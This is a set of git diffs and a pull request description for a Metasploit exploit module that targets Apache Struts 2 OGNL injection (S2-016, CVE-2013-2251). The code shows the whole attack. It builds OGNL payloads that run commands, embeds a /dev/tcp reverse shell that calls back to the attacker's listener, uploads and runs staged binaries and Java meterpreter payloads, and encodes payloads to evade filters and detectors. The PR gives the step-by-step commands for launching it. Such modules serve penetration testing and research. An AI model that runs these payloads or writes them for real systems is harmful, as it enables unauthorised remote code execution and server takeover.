 		struts_action = datastore['STRUTS_ACTION']
 		ognl_eval = Rex::Text::uri_encode(datastore['OGNL_EVAL'])
-		# Construt payload
+		# Construt the payload
 		case opts
 			when 'check'
 				payload = "?#{struts_action}:#{ognl_eval}{new%20java.lang.String('#{proof}')}=#{tail}"
@@ -123,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'method' => http_method
 		})
 
-		# Request and response if verbose enabled
+		# Request and response if verbose is enabled
 		vprint_status("Request:\n#{http_method} #{uri}")
 		vprint_status("Response:\n"+res.to_s)
 
@@ -168,12 +174,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Retrieve target machine and port
 		target = datastore['LHOST'].to_s
 		port = String.new(datastore['LPORT'].to_s)
-
 		# Embedded one liner reverse shell with shell interpreter
 		cmds = "/bin/sh -c /bin/sh@-i@&>@/dev/tcp/HOST/PORT@0>&1@2>&1"
 		cmds.gsub!(/HOST/, target)
 		cmds.gsub!(/PORT/, port)
-
 		# Execute reverse bash shell command
 		execute_command(cmds)
 	end
@@ -186,13 +190,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		execute_command(cmd, 'java')
 	end
 
-	def linux_stager
+	def unix_stager
 		# Define dropper payload properties
 		@payload_exe = "/tmp/" + rand_text_alphanumeric(8+rand(8))
 		append = 'false'
 		exe = generate_payload_exe
 
-		Uploading the generated payload
+		# Uploading the generated payload
 		chunk_length = 384 # 512 bytes when base64 encoded
 		while(exe.length > chunk_length)
 			java_upload_part(exe[0, chunk_length], @payload_exe, append)
@@ -201,6 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 		java_upload_part(exe, @payload_exe, append)
 
+		# Executing payload
 		execute_command("/bin/sh -c chmod@+x@#{@payload_exe}")
 		execute_command("/bin/sh -c #{@payload_exe}")
 	end
@@ -221,18 +226,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		java_upload_part(jar, @payload_exe, append)
 
 		cmd = ""
-		# enable static method accessible
+		# Enable static method accessible
 		cmd << "#_memberAccess[\"allowStaticMethodAccess\"]=true,"
-		# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
+		# Disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
 		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
 		cmd << "#q.setAccessible(true),#q.set(null,true),"
 		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
 		cmd << "#q.setAccessible(true),#q.set(null,false),"
-		# create classloader
+		# Create classloader
 		cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})"
-		# load class
+		# Load class
 		cmd << ",#c=#cl.loadClass('metasploit.Payload')"
-		# invoke main method
+		# Invoke main method
 		cmd << ",#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
 		cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
 
@@ -241,44 +246,51 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def on_new_session(client)
-
+		# Traditional payload
 		if client.type != "meterpreter"
 			print_error("Please use a meterpreter payload in order to automatically cleanup.")
 			print_error("The #{@payload_exe} file must be removed manually.")
 			return
 		end
-
+		# Meterpreter payload
 		client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-
 		print_warning("Deleting the #{@payload_exe} file")
 		client.fs.file.rm(@payload_exe)
-
 	end
 
 	def exploit
+		# Executing remote command
 		if not datastore['CMD'].empty?
 			print_status("Executing command")
 			execute_command(datastore['CMD'])
 			return
 		end
 
-		if not datastore['REVERSE_SHELL_CMD'].empty?
-			if to_boolean(datastore['REVERSE_SHELL_CMD'])
-				print_status("Executing reverse bash shell command")
-				reverse_shell_cmd_stager
-				return
+		# Executing reverse bash shell command
+		if target['Platform'] != "java"
+			if not datastore['REVERSE_SHELL_CMD'].empty?
+				if to_boolean(datastore['REVERSE_SHELL_CMD'])
+					print_status("Executing reverse bash shell command")
+					reverse_shell_cmd_stager
+					return
+				end
 			end
 		end
 
+		# Executing payload on target platform
 		case target['Platform']
 			when 'linux'
-				linux_stager
+				print_status("Executing payload on Linux platform")
+				unix_stager
+			when 'osx'
+				print_status("Executing payload on Mac OS X platform")
+				unix_stager
 			when 'java'
+				print_status("Executing payload on Java platform")
 				java_stager
 			else
-				fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
+				fail_with(Exploit::Failure::NoTarget, "Unsupported target platform")
 		end
-
 		handler
 	end
 end

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					]
 				],
 			'DisclosureDate' => 'Jul 2 2013',
-			'DefaultTarget' => 1))
+			'DefaultTarget' => 2))
 
 			register_options(
 				[
@@ -111,7 +111,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		http_method = datastore['HTTPMETHOD']
 		payload, proof = generate_struts_payload('check')
 		uri = normalize_uri(target_uri.path)
-		uri << payload
 
 		# Check whether target is reachable
 		res = send_request_cgi({
@@ -124,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# Check the target
+		uri << payload
 		res = send_request_cgi({
 			'uri' => uri,
 			'method' => http_method

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 				This module demonstrates remote command execution or vulnerable target.
 
-				This module has been tested successfully on Stringruts 2.3.15 over Tomcat 7, with
+				This module has been tested successfully on Apache Struts 2.3.15 over Tomcat 7, with
 				Red Hat Enterprise Linux 5 and Mac OS X Lion (10.7) operating systems
 			},
 			'Author'         =>

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			when 'java'
 				ognl = cmd
 			when 'cmd'
-				cmd.gsub!(' ','\',\'')
+				cmd.gsub!(/\s+/,'\',\'')
 				cmd.gsub!('@',' ')
 				ognl = "(new java.lang.ProcessBuilder(new java.lang.String[]{'#{cmd}'})).start()"
 		end

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -79,38 +79,56 @@ class Metasploit3 < Msf::Exploit::Remote
 					Opt::RPORT(8080),
 					OptEnum.new('HTTPMETHOD', [ true, 'HTTP Method to use, GET or POST', 'GET', ['GET','POST']]),
 					OptEnum.new('OGNL_EVAL', [ true, 'OGNL expression opening bracket, % or $', '$', ['$','%']]),
+					OptEnum.new('OGNL_ENCODE', [ true, 'Encoding of OGNL expression', 'unicode', ['unicode','octal','none']]),
 					OptEnum.new('STRUTS_ACTION', [ true, 'Action of Struts 2 DefaultActionMapper: action, redirect and redirectAction', 'redirect', ['action','redirect','redirectAction']]),
 					OptString.new('TARGETURI', [ true, 'The path to a struts application action i.e. /struts2-showcase/skill/edit.action', ""]),
 					OptString.new('CMD', [ false, 'Execute a specific command', "" ]),
+					OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
 					OptBool.new('REVERSE_SHELL_CMD', [ false, 'Execute the pre-defined reverse bash shell command', false ])
 				], self.class)
 	end
 
-	def generate_struts_payload(opts = {})
+	def ognl_encode(str, opt = {})
+		return str.unpack('U*').map{ |i| "\\u" + i.to_s(16).rjust(4,'0') }.join
+	end
+
+	def generate_struts_payload(cmd, opts = {})
 		# Initial required parameter
 		proof = rand_text_alpha(6 + rand(4))
 		tail = rand_text_alpha(6 + rand(4))
 		struts_action = datastore['STRUTS_ACTION']
 		ognl_eval = Rex::Text::uri_encode(datastore['OGNL_EVAL'])
+		ognl_encode = datastore['OGNL_ENCODE']
 
-		# Construt the payload
+		# Construct the payload
 		case opts
 			when 'check'
-				payload = "?#{struts_action}:#{ognl_eval}{new%20java.lang.String('#{proof}')}=#{tail}"
-				return [ payload, proof ]
+				ognl = "new java.lang.String('#{proof}')"
 			when 'java'
-				payload = "?#{struts_action}:#{ognl_eval}{CMD}=#{tail}"
-				return payload
+				ognl = cmd
 			when 'cmd'
-				payload = "?#{struts_action}:#{ognl_eval}{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'CMD'})).start()}=#{tail}"
-				return payload
+				cmd.gsub!(' ','\',\'')
+				cmd.gsub!('@',' ')
+				ognl = "(new java.lang.ProcessBuilder(new java.lang.String[]{'#{cmd}'})).start()"
 		end
+
+		# Encoding
+		if ognl_encode == "unicode"
+			ognl = ognl_encode(ognl, "unicode")
+		else
+			ognl = Rex::Text::uri_encode(ognl)
+		end
+
+		# Return generated payload
+		payload = "?#{struts_action}:#{ognl_eval}{#{ognl}}=#{tail}"
+		return [ payload, proof ] if opts == "check"
+		return payload
 	end
 
 	def check
 		# Initial request parameter
 		http_method = datastore['HTTPMETHOD']
-		payload, proof = generate_struts_payload('check')
+		payload, proof = generate_struts_payload(nil, 'check')
 		uri = normalize_uri(target_uri.path)
 
 		# Check whether target is reachable
@@ -150,13 +168,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Append injected command
 		case opts
 			when 'java'
-				uri << generate_struts_payload('java')
-				uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
+				uri << generate_struts_payload(cmd, 'java')
 			else
-				uri << generate_struts_payload('cmd')
-				cmd.gsub!(' ','\',\'')
-				cmd.gsub!('@',' ')
-				uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
+				uri << generate_struts_payload(cmd, 'cmd')
 		end
 
 		res = send_request_raw({
@@ -194,13 +208,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def platform_specific_stager(platform = {})
 		# Define payload properties
+		writable_dir = datastore['WritableDir'] + "/"
 		append = 'false'
 		case platform
 			when 'unix'
-				@payload_exe = "/tmp/" + rand_text_alphanumeric(8+rand(8))
+				@payload_exe = writable_dir + rand_text_alphanumeric(8+rand(8))
 				exe = generate_payload_exe
 			when 'java'
-				@payload_exe = "/tmp/" + rand_text_alphanumeric(8+rand(8)) + ".jar"
+				@payload_exe = writable_dir + rand_text_alphanumeric(8+rand(8)) + ".jar"
 				exe = payload.encoded_jar.pack
 		end
 

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -1,0 +1,285 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Remote Command Execution in Apache Struts 2.0.0 - 2.3.15 DefaultActionMapper (S2-016)',
+			'Description'    => %q{
+				Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or
+				"redirectAction:" available in Struts 2 DefaultActionMapper is not properly sanitized.
+				In addition with any following information will be evaluated as OGNL expression against
+				the value stack resulting in command injection.
+
+				This module demonstrates remote command execution or vulnerable target.
+
+				This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with
+				Red Hat Enterprise Linux 5 and Mac OS X Lion (10.7) operating systems
+			},
+			'Author'         =>
+				[
+					'Takeshi Terada', # Vulnerability discovery
+					'sinn3r',       # Original metasploit module for DefaultActionMapper
+					'juan vazquez', # Original metasploit module for DefaultActionMapper
+					'mihi', # Original ARCH_JAVA support
+					'Lersak Limwiwatkul (Joe) <lersak[@]gmail.com>' # Remote command execution support
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2013-2251' ],
+					[ 'OSVDB', '95405' ],
+					[ 'BID', '61189' ],
+					[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]
+				],
+			'Platform' 	 => [ 'linux', 'java' ],
+			'Privileged'     => false,
+			'Targets'        =>
+				[
+					[ 'Linux Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux',
+						}
+					],
+					[ 'Java Universal',
+						{
+							'Arch' => ARCH_JAVA,
+							'Platform' => 'java'
+						}
+					]
+				],
+			'DisclosureDate' => 'Jul 2 2013',
+			'DefaultTarget' => 1))
+
+			register_options(
+				[
+					Opt::LPORT(4444),
+					Opt::RPORT(8080),
+					OptEnum.new('HTTPMETHOD', [ true, 'HTTP Method to use, GET or POST', 'GET', ['GET','POST']]),
+					OptEnum.new('OGNL_EVAL', [ true, 'OGNL expression evaluation opening bracket, % or $', '$', ['$','%']]),
+					OptEnum.new('STRUTS_ACTION', [ true, 'Possible Struts 2 DefaultActionMapper: action, redirect and redirectAction', 'redirect', ['action','redirect','redirectAction']]),
+					OptString.new('TARGETURI', [ true, 'The path to a struts application action i.e. /app/edit.action', ""]),
+					OptString.new('CMD', [ false, 'Execute a specific command', "" ]),
+					OptString.new('REVERSE_SHELL_CMD', [ false, 'Execute the pre-defined reverse bash shell command', "False" ])
+				], self.class)
+	end
+
+	def to_boolean(s)
+		return !!(s =~ /^(true|t|yes|y|1)$/i)
+	end
+
+	def generate_struts_payload(opts = {})
+		# Initial required parameter
+		proof = rand_text_alpha(6 + rand(4))
+		tail = rand_text_alpha(6 + rand(4))
+		struts_action = datastore['STRUTS_ACTION']
+		ognl_eval = Rex::Text::uri_encode(datastore['OGNL_EVAL'])
+		# Construt payload
+		case opts
+			when 'check'
+				payload = "?#{struts_action}:#{ognl_eval}{new%20java.lang.String('#{proof}')}=#{tail}"
+				return [ payload, proof ]
+			when 'java'
+				payload = "?#{struts_action}:#{ognl_eval}{CMD}=#{tail}"
+				return payload
+			when 'cmd'
+				payload = "?#{struts_action}:#{ognl_eval}{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'CMD'})).start()}=#{tail}"
+				return payload
+		end
+	end
+
+	def check
+		# Initial request parameter
+		http_method = datastore['HTTPMETHOD']
+		payload, proof = generate_struts_payload('check')
+		uri = normalize_uri(target_uri.path)
+		uri << payload
+
+		# Check whether target is reachable
+		res = send_request_cgi({
+			'uri' => uri,
+			'method' => http_method
+		})
+		if res.nil? or res.code != 200
+			print_error("Target is not accessible (#{rhost}:#{rport}#{uri})")
+			return Exploit::CheckCode::Unknown
+		end
+
+		# Check the target
+		res = send_request_cgi({
+			'uri' => uri,
+			'method' => http_method
+		})
+
+		# Request and response if verbose enabled
+		vprint_status("Request:\n#{http_method} #{uri}")
+		vprint_status("Response:\n"+res.to_s)
+
+		# Status of target
+		if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/
+			return Exploit::CheckCode::Vulnerable
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def execute_command(cmd, opts = {})
+		vprint_status("Attempting to execute: #{cmd}")
+		cmds = cmd
+		uri = String.new(datastore['TARGETURI'])
+		http_method = datastore['HTTPMETHOD']
+
+		# Append injected command
+		case opts
+			when 'java'
+				uri << generate_struts_payload('java')
+				uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
+			else
+				uri << generate_struts_payload('cmd')
+				cmds.gsub!(' ','\',\'')
+				cmds.gsub!('@',' ')
+				uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
+		end
+
+		res = send_request_raw({
+			'uri'     => uri,
+			'method'  => http_method
+		}, 5)
+
+		# Request and response if verbose enabled
+		vprint_status("Request:\n#{http_method} #{uri}")
+		vprint_status("Response:\n"+res.to_s)
+
+	end
+
+	def reverse_shell_cmd_stager
+		# Retrieve target machine and port
+		target = datastore['LHOST'].to_s
+		port = String.new(datastore['LPORT'].to_s)
+
+		# Embedded one liner reverse shell with shell interpreter
+		cmds = "/bin/sh -c /bin/sh@-i@&>@/dev/tcp/HOST/PORT@0>&1@2>&1"
+		cmds.gsub!(/HOST/, target)
+		cmds.gsub!(/PORT/, port)
+
+		# Execute reverse bash shell command
+		execute_command(cmds)
+	end
+
+	def java_upload_part(part, filename, append = 'false')
+		cmd = ""
+		cmd << "new java.io.FileOutputStream('#{filename}',#{append})"
+		cmd << ".write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))"
+		cmd << ".close()"
+		execute_command(cmd, 'java')
+	end
+
+	def linux_stager
+		# Define dropper payload properties
+		@payload_exe = "/tmp/" + rand_text_alphanumeric(8+rand(8))
+		append = 'false'
+		exe = generate_payload_exe
+
+		Uploading the generated payload
+		chunk_length = 384 # 512 bytes when base64 encoded
+		while(exe.length > chunk_length)
+			java_upload_part(exe[0, chunk_length], @payload_exe, append)
+			exe = exe[chunk_length, exe.length - chunk_length]
+			append='true'
+		end
+		java_upload_part(exe, @payload_exe, append)
+
+		execute_command("/bin/sh -c chmod@+x@#{@payload_exe}")
+		execute_command("/bin/sh -c #{@payload_exe}")
+	end
+
+	def java_stager
+		# Define dropper payload properties
+		@payload_exe = "/tmp/" + rand_text_alphanumeric(8+rand(8)) + ".jar"
+		append = 'false'
+		jar = payload.encoded_jar.pack
+
+		# Iterate dropping the generated payload
+		chunk_length = 384 # 512 bytes when base64 encoded
+		while(jar.length > chunk_length)
+			java_upload_part(jar[0, chunk_length], @payload_exe, append)
+			jar = jar[chunk_length, jar.length - chunk_length]
+			append='true'
+		end
+		java_upload_part(jar, @payload_exe, append)
+
+		cmd = ""
+		# enable static method accessible
+		cmd << "#_memberAccess[\"allowStaticMethodAccess\"]=true,"
+		# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
+		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
+		cmd << "#q.setAccessible(true),#q.set(null,true),"
+		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
+		cmd << "#q.setAccessible(true),#q.set(null,false),"
+		# create classloader
+		cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})"
+		# load class
+		cmd << ",#c=#cl.loadClass('metasploit.Payload')"
+		# invoke main method
+		cmd << ",#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
+		cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
+
+		# Loading java payload on target machine
+		execute_command(cmd, 'java')
+	end
+
+	def on_new_session(client)
+
+		if client.type != "meterpreter"
+			print_error("Please use a meterpreter payload in order to automatically cleanup.")
+			print_error("The #{@payload_exe} file must be removed manually.")
+			return
+		end
+
+		client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+
+		print_warning("Deleting the #{@payload_exe} file")
+		client.fs.file.rm(@payload_exe)
+
+	end
+
+	def exploit
+		if not datastore['CMD'].empty?
+			print_status("Executing command")
+			execute_command(datastore['CMD'])
+			return
+		end
+
+		if not datastore['REVERSE_SHELL_CMD'].empty?
+			if to_boolean(datastore['REVERSE_SHELL_CMD'])
+				print_status("Executing reverse bash shell command")
+				reverse_shell_cmd_stager
+				return
+			end
+		end
+
+		case target['Platform']
+			when 'linux'
+				linux_stager
+			when 'java'
+				java_stager
+			else
+				fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
+		end
+
+		handler
+	end
+end
+


### PR DESCRIPTION
This additional module demonstrates remote command execution on supported platform. See details below for more information and how to test this module. Special thanks to Juan Vazquez and Sinn3r as original author of many struts exploit modules.

Features in current development
- [x] Current platform support: Unix (Linux and Mac OS X) and Java (Tested on Linux, Mac OS X, Windows 7 and AIX 6.0)
- [x] Support two types OGNL double evaluation expression %{} or ${} in payload
- [x] Support three actions of DefaultActionMapper including "action:", "redirect:" and "redirectAction:" in payload 
- [x] Support UNICODE encoding scheme in OGNL expression to bypass the filter or detector
- [x] Support Mix UNICODE and OCTAL encoding scheme in OGNL expression. Note that this encoding works only with Struts < 2.3.13.4 unless there is a configuration of "struts.allowed.action.names" in struts.xml on target applications to allow OCTAL encoding in OGNL expression (Reference: http://struts.apache.org/release/2.3.x/docs/s2-015.html)
- [x] Support payload in GET and POST with/without an additional HTTP message

Basic initialization

```
use exploit/multi/http/struts_code_exec_default_action_mapper
set TARGETURI /struts2-showcase/skill/edit.action
set RHOST <IP>
set LHOST <IP>
```

Check target

```
check
set OGNL_EVAL %
set STRUTS_ACTION redirectAction
check
set STRUTS_ACTION redirect
set OGNL_ENCODE none
check
set OGNL_ENCODE unicode
check
set OGNL_ENCODE mixoctal
check
set OGNL_ENCODE none
check
set STRUTS_ACTION redirect
set OGNL_ENCODE unicode
```

Use POST with HTTP message

```
set HTTPMETHOD POST
set HTTP_MESSAGE "id=1&__customizedToken=5555"
```

Uploading and executing payload on Java platform

```
set TARGET 2
set PAYLOAD java/meterpreter/reverse_tcp
set CHUNK_LEN 100
exploit
```

Executing remote command

```
set TARGET 0
set CMD touch /tmp/test
exploit
set CMD ''
```

Uploading and executing payload on Mac OS X platform

```
set LPORT 5555
set TARGET 1
set PAYLOAD osx/x86/vforkshell_reverse_tcp
set CHUNK_LEN 80
exploit
```

Uploading and executing payload on Linux Platform

```
set TARGET 0
set PAYLOAD linux/x86/shell_reverse_tcp
set CHUNK_LEN 200
exploit
```

Executing reverse bash shell command (Available on Unix platform only)

```
set TARGET 0
set PAYLOAD linux/x86/shell_reverse_tcp
set REVERSE_SHELL_CMD true
exploit
```

Any comments or suggestions, feel free to let me know. Thank you.
